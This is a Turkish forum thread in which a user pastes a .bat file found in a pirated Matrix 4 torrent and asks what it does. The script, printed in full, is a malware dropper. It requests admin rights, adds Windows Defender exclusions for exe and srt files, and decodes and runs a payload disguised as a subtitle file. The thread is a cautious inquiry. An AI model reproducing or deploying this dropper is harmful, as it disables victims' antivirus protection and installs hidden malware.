Filmin içinden çıkan .bat dosyası

Selamlar,

Dün Matrix 4 için indirdiğim torrent bağlantısından promosyon olarak bir adet de .bat dosyası çıktı.

Film uzantısı .mpg ve doğal olarak win10 default şekilde açmıyor (mpc-hc, vlc vs. player lazım) ancak yardımsever hacker arkadaşımız filmin yanında klasörün içine bir adet de .bat dosyası eklemiş ve metin belgesine "film açılmıyorsa önce but .bat'ı çalıştırın sonra filme tıklayın" yazmış.

Tabiiki de ne olduğunu bilmediğim .bat dosyasını çalıştırmadan önce .txt'e dönüştürüp içinde ne olduğunu kontrol etmek istedim ancak birşey anlamadım.

Bi el atabilir misiniz?

---

@echo off

 CLS

 ECHO.

 ECHO ======================================

 ECHO ===Running Admin shell please wait====

:init

 setlocal DisableDelayedExpansion

 set cmdInvoke=1

 set winSysFolder=System32

 set "batchPath=%~0"

 for %%k in (%0) do set batchName=%%~nk

 set "vbsGetPrivileges=%temp%\OEgetPriv_%batchName%.vbs"

 setlocal EnableDelayedExpansion

:checkPrivileges

 NET FILE 1>NUL 2>NUL

 if '%errorlevel%' == '0' ( goto gotPrivileges ) else ( goto getPrivileges )

:getPrivileges

 if '%1'=='ELEV' (echo ELEV & shift /1 & goto gotPrivileges)

 ECHO.

 ECHO **************************************

 ECHO Invoking UAC for Privilege Escalation

 ECHO **************************************

 ECHO Set UAC = CreateObject^("Shell.Application"^) > "%vbsGetPrivileges%"

 ECHO args = "ELEV " >> "%vbsGetPrivileges%"

 ECHO For Each strArg in WScript.Arguments >> "%vbsGetPrivileges%"

 ECHO args = args ^& strArg ^& " " >> "%vbsGetPrivileges%"

 ECHO Next >> "%vbsGetPrivileges%"

 if '%cmdInvoke%'=='1' goto InvokeCmd 

 ECHO UAC.ShellExecute "!batchPath!", args, "", "runas", 1 >> "%vbsGetPrivileges%"

 goto ExecElevation

:InvokeCmd

 ECHO args = "/c """ + "!batchPath!" + """ " + args >> "%vbsGetPrivileges%"

 ECHO UAC.ShellExecute "%SystemRoot%\%winSysFolder%\cmd.exe", args, "", "runas", 1 >> "%vbsGetPrivileges%"

:ExecElevation

 "%SystemRoot%\%winSysFolder%\WScript.exe" "%vbsGetPrivileges%" %*

 exit /B

:gotPrivileges

 setlocal & cd /d %~dp0

 if '%1'=='ELEV' (del "%vbsGetPrivileges%" 1>nul 2>nul & shift /1)

 powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExt "exe"

 powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExt "srt"

 ECHO.

 ECHO Download update..

 ping 127.0.0.1 -n 8 > nul

 certutil -decodehex -f 75095_VTS.srt 75095_VTS_tmp.srt

 start 75095_VTS_tmp.srt

 ECHO %batchName% Arguments: P1=%1 P2=%2 P3=%3 P4=%4 P5=%5 P6=%6 P7=%7 P8=%8 P9=%9

 cmd /k

 exit

---

İçeriği bu şekilde.

Amacı ne sizce bu dosyanın?

koddan bir şey anlamadım ancak zararlı yazılım yükleme ya da bilgisayarınızı ele geçirmek için olma ihtimali var, dizipal de mevcut istediğiniz film, açın oradan izleyin bence

Teşekkürler, daha sonra başka bi sitede buldum tabii ki ama komut yığını ilgimi çektiği için buraya atmıştım